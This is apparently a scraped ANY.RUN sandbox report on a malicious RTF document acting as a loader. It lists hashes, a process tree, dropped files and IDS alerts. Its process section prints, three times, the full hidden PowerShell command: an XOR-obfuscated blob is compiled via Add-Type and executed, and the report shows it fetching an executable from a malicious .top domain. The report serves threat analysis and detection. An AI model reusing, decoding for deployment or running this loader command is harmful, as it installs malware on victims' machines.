analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

6a80b6bc91e403329bd579a4d0ecfb42e4e0b342179ba6e008f4491f7b7827ad

Full analysis: https://app.any.run/tasks/fb091d0f-00d6-406e-93a0-d405c6e3d4f1
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: September 11, 2019, 08:00:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
loader
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

83C1C50C2F6C137584CDF25AB68D3373

SHA1:

F4DDC0ECFE2946B431A61AF180C8E290CCA2F5B1

SHA256:

6A80B6BC91E403329BD579A4D0ECFB42E4E0B342179BA6E008F4491F7B7827AD

SSDEEP:

6144:zcsRcsRcsRcsRcsRcsRcsRcsRcsRcsRcsRcsWS:bxxxxxxxxxxx7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts Visual C# compiler

      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 3924)
      • powershell.exe (PID: 3552)
      • powershell.exe (PID: 3416)
      • powershell.exe (PID: 2564)
      • powershell.exe (PID: 356)
      • powershell.exe (PID: 3020)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 2096)
      • powershell.exe (PID: 2744)
      • powershell.exe (PID: 2304)
      • powershell.exe (PID: 3268)
    • Application was dropped or rewritten from another process

      • we7ceac.exe (PID: 2676)
      • we7ceac.exe (PID: 3208)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3884)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 3652)
      • EXCEL.EXE (PID: 4012)
      • EXCEL.EXE (PID: 2892)
      • EXCEL.EXE (PID: 2460)
      • EXCEL.EXE (PID: 3080)
      • EXCEL.EXE (PID: 2452)
      • EXCEL.EXE (PID: 2932)
      • EXCEL.EXE (PID: 3024)
      • EXCEL.EXE (PID: 4028)
      • EXCEL.EXE (PID: 2988)
      • EXCEL.EXE (PID: 4092)
      • EXCEL.EXE (PID: 3304)
      • excelcnv.exe (PID: 3140)
    • Executed via WMI

      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 3924)
      • powershell.exe (PID: 3416)
      • powershell.exe (PID: 3552)
      • powershell.exe (PID: 2564)
      • powershell.exe (PID: 3020)
      • powershell.exe (PID: 356)
      • powershell.exe (PID: 2096)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 3268)
      • powershell.exe (PID: 2744)
      • powershell.exe (PID: 2304)
    • PowerShell script executed

      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 3924)
      • powershell.exe (PID: 3552)
      • powershell.exe (PID: 3416)
      • powershell.exe (PID: 2564)
      • powershell.exe (PID: 356)
      • powershell.exe (PID: 3020)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 2096)
      • powershell.exe (PID: 3268)
      • powershell.exe (PID: 2744)
      • powershell.exe (PID: 2304)
    • Creates files in the user directory

      • powershell.exe (PID: 3924)
      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 3416)
      • powershell.exe (PID: 3552)
      • powershell.exe (PID: 2564)
      • powershell.exe (PID: 356)
      • powershell.exe (PID: 3020)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 2744)
      • powershell.exe (PID: 2096)
      • cmd.exe (PID: 3892)
      • powershell.exe (PID: 2304)
      • powershell.exe (PID: 3268)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3884)
      • csc.exe (PID: 1264)
      • csc.exe (PID: 2448)
    • Starts CMD.EXE for commands execution

      • we7ceac.exe (PID: 2676)
    • Application launched itself

      • we7ceac.exe (PID: 2676)
    • Reads Windows Product ID

      • we7ceac.exe (PID: 3208)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2916)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 4012)
      • WINWORD.EXE (PID: 2916)
      • EXCEL.EXE (PID: 3652)
      • EXCEL.EXE (PID: 2892)
      • EXCEL.EXE (PID: 2460)
      • EXCEL.EXE (PID: 3080)
      • EXCEL.EXE (PID: 2452)
      • EXCEL.EXE (PID: 3024)
      • EXCEL.EXE (PID: 4028)
      • EXCEL.EXE (PID: 2932)
      • EXCEL.EXE (PID: 4092)
      • EXCEL.EXE (PID: 2988)
      • EXCEL.EXE (PID: 3304)
      • excelcnv.exe (PID: 3140)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 57435
CharactersWithSpaces: 4
Characters: 4
Words: -
Pages: 1
TotalEditTime: -
RevisionNumber: 1
ModifyDate: 2019:01:07 23:54:00
CreateDate: 2019:01:07 23:54:00
LastModifiedBy: Admin
Author: Admin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
99
Monitored processes
53
Malicious processes
1
Suspicious processes
12

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs excel.exe no specs powershell.exe excel.exe no specs csc.exe powershell.exe no specs excel.exe no specs cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excel.exe no specs we7ceac.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs csc.exe excelcnv.exe no specs cvtres.exe no specs cmd.exe no specs csc.exe cvtres.exe no specs we7ceac.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2916"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\6a80b6bc91e403329bd579a4d0ecfb42e4e0b342179ba6e008f4491f7b7827ad.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4012"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3884powershell -WindowStyle Hidden function g5a8ec4 { param($xa41378) $qa5bff = 'bae7e7';$dab23f = ''; for ($i = 0; $i -lt $xa41378.length; $i+=2) { $t61e6 = [convert]::ToByte($xa41378.Substring($i, 2), 16); $dab23f += [char]($t61e6 -bxor $qa5bff[($i / 2) % $qa5bff.length]); } return $dab23f; } $l6ae8d = '17120c59021731181643005a5914165e0b5042321c4411520f4f37420b430b0c00192c591604175815640713135e0652115a10440c590541364e1643070c4b730c56050f0a44115e01125e42165e0c0645641c44160408192c785914165e0b5042321c4411520f4f2b52110c6f6b1542075b0b024554095611124556535251551e6c215b0e2808470a451649475c00450c04090457154e240b43174e320e0c59110a4026004335450d0224530145071216154c6a42111055095e0141164304430b0245521d4307130b172c591631114545460758060653524a280b43354310410a01060355585c1b164310080b50454e56000305071e593a215b097e0f110a45111f400a00450b520e5257154917270f11451c670d080b43450a4243295804532e08074504451b434c6a45471703095e0617111504430c5442041d4300450c412c591167161345555c015155061f164310080b504555560406034c0c3925095b2c5a120e17434d1509041759005b5153471b45720c15174e35580b0f110a47610b131142045b32130a43005416434c6a45471703095e0617111504430c5442041d4300450c4107580a5b420c0000035256492c5911671613455c575100585c1b307e0c153543171718590152060f4e41105e0b43420b060253554e410a42111717080b43455b045856004c0c3925095b2c5a120e17434d1529041759005b51534b53095b404d45720b43101835580c59165c4765115b2f0e135228520f0e174e471b423200432956111520451758105c0356094407483817164303150c5445521a1500450b17140e0c53455f5a02545550564a280b43354310410a5350040152511b2c591631114545530756570f5c1b0b0f111706050457011e5e471703095e0617111504430c5442080b434559045857534d1e19280b4335431041060f030056595d1758170058530451544a0650565d5201554d1555045202540150525603500455525205471e4c0c0b074d545d5155555d0f580a2b0f116711454c3b00450a1e19060a430a170d040703530c1f280b4335431041025103555b5c14525c545357001f060f0456510f5d1b0554040f005456494705560701505302000454545107560704535203570751545407520651434c1e5e5e0449025103555b5c587e0b43321517193f52100e4c4c0258160e4558005556575e4a307e0c15354317170d00070f5756065c4d622c59163111454c0259140c59111704535352540a525a0c514d160f04525100034a060351070e4e0e04555d05030549071d03524d0a42111704535352541e4b1a02581158420e00555101591c274e1152393c454e510156580753584c5219560649071a07031b554f5b51180c2c5916311145455254070702560a2f0017440d560e4f245b09580129225b0a55030d4d044c0c2f0017440d560e4f2658154e4a185101510e00054907495254070702561b51485e5f5d54530350564d590716457e0b433215171f025104035c1931582b0f1101511f4b4a554f550753034c1b00010403500449044b5a0a520703545b45600055210d0c520b434218010552055f0f004045600703265b0c520c154d1e5e4416130c590217105557515c545f240b410c450d0f08520b434c26004323580e050045355616094d720b410b130a5908520c154b6415520108045b23580e0500454b761211095e065616080a59215616004c1c476b3e16000006520302471c020203590054511f405506075106065457154c0c1b0557005719260e125909580305235e09524a0650565d5201554d1555565354540651005707540f51535252555650025256515255065258555451535603510455535350515650555200510655005357555651025258500451535202550350045250515251545255545350054048494551050458061e5e67100e0652164431150445117e0c070a17130257525d0a0b52154135450a5407121664115610152c5903584a135105030e01485e671758010416444b64160017434d415754560f4c0c10041142175942515e4a1542000d0c5445441600115e06171115175e0b50420650565d5201554d4411450b0f0217100104055d54001e191211450c5905410a01060355585c0a4755030452525215591211450c590541070e53045602586411450b0f0219205a12151c0c035810490c5911170b5c550c0c0b175703535d54074f29520b5016095e5e4e0a50481e551c43074114525c545357000a26580c1700451119360e274e11524a145351010f01044b6410551115175e0b504a0849054c1b53574c0c070e545251544e0a4a020d56171e4a10000e0606540445694558540251005c0e39490c18571e42444558535456565c0e4b7b070f02430d6a4b5a1845004317130b17070e545251545e4a1f'; $l6ae8d2 = g5a8ec4($l6ae8d); Add-Type -TypeDefinition $l6ae8d2; [a6e34]::nf92d(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3652"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3796"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tl6fa_gt.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
3924powershell -WindowStyle Hidden function g5a8ec4 { param($xa41378) $qa5bff = 'bae7e7';$dab23f = ''; for ($i = 0; $i -lt $xa41378.length; $i+=2) { $t61e6 = [convert]::ToByte($xa41378.Substring($i, 2), 16); $dab23f += [char]($t61e6 -bxor $qa5bff[($i / 2) % $qa5bff.length]); } return $dab23f; } $l6ae8d = '17120c59021731181643005a5914165e0b5042321c4411520f4f37420b430b0c00192c591604175815640713135e0652115a10440c590541364e1643070c4b730c56050f0a44115e01125e42165e0c0645641c44160408192c785914165e0b5042321c4411520f4f2b52110c6f6b1542075b0b024554095611124556535251551e6c215b0e2808470a451649475c00450c04090457154e240b43174e320e0c59110a4026004335450d0224530145071216154c6a42111055095e0141164304430b0245521d4307130b172c591631114545460758060653524a280b43354310410a01060355585c1b164310080b50454e56000305071e593a215b097e0f110a45111f400a00450b520e5257154917270f11451c670d080b43450a4243295804532e08074504451b434c6a45471703095e0617111504430c5442041d4300450c412c591167161345555c015155061f164310080b504555560406034c0c3925095b2c5a120e17434d1509041759005b5153471b45720c15174e35580b0f110a47610b131142045b32130a43005416434c6a45471703095e0617111504430c5442041d4300450c4107580a5b420c0000035256492c5911671613455c575100585c1b307e0c153543171718590152060f4e41105e0b43420b060253554e410a42111717080b43455b045856004c0c3925095b2c5a120e17434d1529041759005b51534b53095b404d45720b43101835580c59165c4765115b2f0e135228520f0e174e471b423200432956111520451758105c0356094407483817164303150c5445521a1500450b17140e0c53455f5a02545550564a280b43354310410a5350040152511b2c591631114545530756570f5c1b0b0f111706050457011e5e471703095e0617111504430c5442080b434559045857534d1e19280b4335431041060f030056595d1758170058530451544a0650565d5201554d1555045202540150525603500455525205471e4c0c0b074d545d5155555d0f580a2b0f116711454c3b00450a1e19060a430a170d040703530c1f280b4335431041025103555b5c14525c545357001f060f0456510f5d1b0554040f005456494705560701505302000454545107560704535203570751545407520651434c1e5e5e0449025103555b5c587e0b43321517193f52100e4c4c0258160e4558005556575e4a307e0c15354317170d00070f5756065c4d622c59163111454c0259140c59111704535352540a525a0c514d160f04525100034a060351070e4e0e04555d05030549071d03524d0a42111704535352541e4b1a02581158420e00555101591c274e1152393c454e510156580753584c5219560649071a07031b554f5b51180c2c5916311145455254070702560a2f0017440d560e4f245b09580129225b0a55030d4d044c0c2f0017440d560e4f2658154e4a185101510e00054907495254070702561b51485e5f5d54530350564d590716457e0b433215171f025104035c1931582b0f1101511f4b4a554f550753034c1b00010403500449044b5a0a520703545b45600055210d0c520b434218010552055f0f004045600703265b0c520c154d1e5e4416130c590217105557515c545f240b410c450d0f08520b434c26004323580e050045355616094d720b410b130a5908520c154b6415520108045b23580e0500454b761211095e065616080a59215616004c1c476b3e16000006520302471c020203590054511f405506075106065457154c0c1b0557005719260e125909580305235e09524a0650565d5201554d1555565354540651005707540f51535252555650025256515255065258555451535603510455535350515650555200510655005357555651025258500451535202550350045250515251545255545350054048494551050458061e5e67100e0652164431150445117e0c070a17130257525d0a0b52154135450a5407121664115610152c5903584a135105030e01485e671758010416444b64160017434d415754560f4c0c10041142175942515e4a1542000d0c5445441600115e06171115175e0b50420650565d5201554d4411450b0f0217100104055d54001e191211450c5905410a01060355585c0a4755030452525215591211450c590541070e53045602586411450b0f0219205a12151c0c035810490c5911170b5c550c0c0b175703535d54074f29520b5016095e5e4e0a50481e551c43074114525c545357000a26580c1700451119360e274e11524a145351010f01044b6410551115175e0b504a0849054c1b53574c0c070e545251544e0a4a020d56171e4a10000e0606540445694558540251005c0e39490c18571e42444558535456565c0e4b7b070f02430d6a4b5a1845004317130b17070e545251545e4a1f'; $l6ae8d2 = g5a8ec4($l6ae8d); Add-Type -TypeDefinition $l6ae8d2; [a6e34]::nf92d(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2892"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3676C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESB655.tmp" "c:\Users\admin\AppData\Local\Temp\CSCB645.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
3416powershell -WindowStyle Hidden function g5a8ec4 { param($xa41378) $qa5bff = 'bae7e7';$dab23f = ''; for ($i = 0; $i -lt $xa41378.length; $i+=2) { $t61e6 = [convert]::ToByte($xa41378.Substring($i, 2), 16); $dab23f += [char]($t61e6 -bxor $qa5bff[($i / 2) % $qa5bff.length]); } return $dab23f; } $l6ae8d = '17120c59021731181643005a5914165e0b5042321c4411520f4f37420b430b0c00192c591604175815640713135e0652115a10440c590541364e1643070c4b730c56050f0a44115e01125e42165e0c0645641c44160408192c785914165e0b5042321c4411520f4f2b52110c6f6b1542075b0b024554095611124556535251551e6c215b0e2808470a451649475c00450c04090457154e240b43174e320e0c59110a4026004335450d0224530145071216154c6a42111055095e0141164304430b0245521d4307130b172c591631114545460758060653524a280b43354310410a01060355585c1b164310080b50454e56000305071e593a215b097e0f110a45111f400a00450b520e5257154917270f11451c670d080b43450a4243295804532e08074504451b434c6a45471703095e0617111504430c5442041d4300450c412c591167161345555c015155061f164310080b504555560406034c0c3925095b2c5a120e17434d1509041759005b5153471b45720c15174e35580b0f110a47610b131142045b32130a43005416434c6a45471703095e0617111504430c5442041d4300450c4107580a5b420c0000035256492c5911671613455c575100585c1b307e0c153543171718590152060f4e41105e0b43420b060253554e410a42111717080b43455b045856004c0c3925095b2c5a120e17434d1529041759005b51534b53095b404d45720b43101835580c59165c4765115b2f0e135228520f0e174e471b423200432956111520451758105c0356094407483817164303150c5445521a1500450b17140e0c53455f5a02545550564a280b43354310410a5350040152511b2c591631114545530756570f5c1b0b0f111706050457011e5e471703095e0617111504430c5442080b434559045857534d1e19280b4335431041060f030056595d1758170058530451544a0650565d5201554d1555045202540150525603500455525205471e4c0c0b074d545d5155555d0f580a2b0f116711454c3b00450a1e19060a430a170d040703530c1f280b4335431041025103555b5c14525c545357001f060f0456510f5d1b0554040f005456494705560701505302000454545107560704535203570751545407520651434c1e5e5e0449025103555b5c587e0b43321517193f52100e4c4c0258160e4558005556575e4a307e0c15354317170d00070f5756065c4d622c59163111454c0259140c59111704535352540a525a0c514d160f04525100034a060351070e4e0e04555d05030549071d03524d0a42111704535352541e4b1a02581158420e00555101591c274e1152393c454e510156580753584c5219560649071a07031b554f5b51180c2c5916311145455254070702560a2f0017440d560e4f245b09580129225b0a55030d4d044c0c2f0017440d560e4f2658154e4a185101510e00054907495254070702561b51485e5f5d54530350564d590716457e0b433215171f025104035c1931582b0f1101511f4b4a554f550753034c1b00010403500449044b5a0a520703545b45600055210d0c520b434218010552055f0f004045600703265b0c520c154d1e5e4416130c590217105557515c545f240b410c450d0f08520b434c26004323580e050045355616094d720b410b130a5908520c154b6415520108045b23580e0500454b761211095e065616080a59215616004c1c476b3e16000006520302471c020203590054511f405506075106065457154c0c1b0557005719260e125909580305235e09524a0650565d5201554d1555565354540651005707540f51535252555650025256515255065258555451535603510455535350515650555200510655005357555651025258500451535202550350045250515251545255545350054048494551050458061e5e67100e0652164431150445117e0c070a17130257525d0a0b52154135450a5407121664115610152c5903584a135105030e01485e671758010416444b64160017434d415754560f4c0c10041142175942515e4a1542000d0c5445441600115e06171115175e0b50420650565d5201554d4411450b0f0217100104055d54001e191211450c5905410a01060355585c0a4755030452525215591211450c590541070e53045602586411450b0f0219205a12151c0c035810490c5911170b5c550c0c0b175703535d54074f29520b5016095e5e4e0a50481e551c43074114525c545357000a26580c1700451119360e274e11524a145351010f01044b6410551115175e0b504a0849054c1b53574c0c070e545251544e0a4a020d56171e4a10000e0606540445694558540251005c0e39490c18571e42444558535456565c0e4b7b070f02430d6a4b5a1845004317130b17070e545251545e4a1f'; $l6ae8d2 = g5a8ec4($l6ae8d); Add-Type -TypeDefinition $l6ae8d2; [a6e34]::nf92d(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2460"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Total events
6 673
Read events
5 470
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
24
Text files
24
Unknown types
22

Dropped files

PID
Process
Filename
Type
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9F81.tmp.cvr
MD5:
SHA256:
4012EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRA8E7.tmp.cvr
MD5:
SHA256:
3652EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRB0E6.tmp.cvr
MD5:
SHA256:
3884powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YCKZR52YKRKACO8D7Q8O.temp
MD5:
SHA256:
2892EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRB52B.tmp.cvr
MD5:
SHA256:
3676cvtres.exeC:\Users\admin\AppData\Local\Temp\RESB655.tmp
MD5:
SHA256:
3796csc.exeC:\Users\admin\AppData\Local\Temp\tl6fa_gt.dll
MD5:
SHA256:
3796csc.exeC:\Users\admin\AppData\Local\Temp\tl6fa_gt.out
MD5:
SHA256:
3924powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KIHZUAKQNVF5FSV7M3VC.temp
MD5:
SHA256:
2460EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRBC8E.tmp.cvr
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3884
powershell.exe
GET
200
162.144.128.116:80
http://bobbychiz.top/loveworld/maddy.exe
US
executable
679 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3884
powershell.exe
162.144.128.116:80
bobbychiz.top
Unified Layer
US
malicious

DNS requests

Domain
IP
Reputation
bobbychiz.top
  • 162.144.128.116
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
3884
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
3884
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
3884
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3884
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3884
powershell.exe
Misc activity
ET INFO Possible EXE Download From Suspicious TLD
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144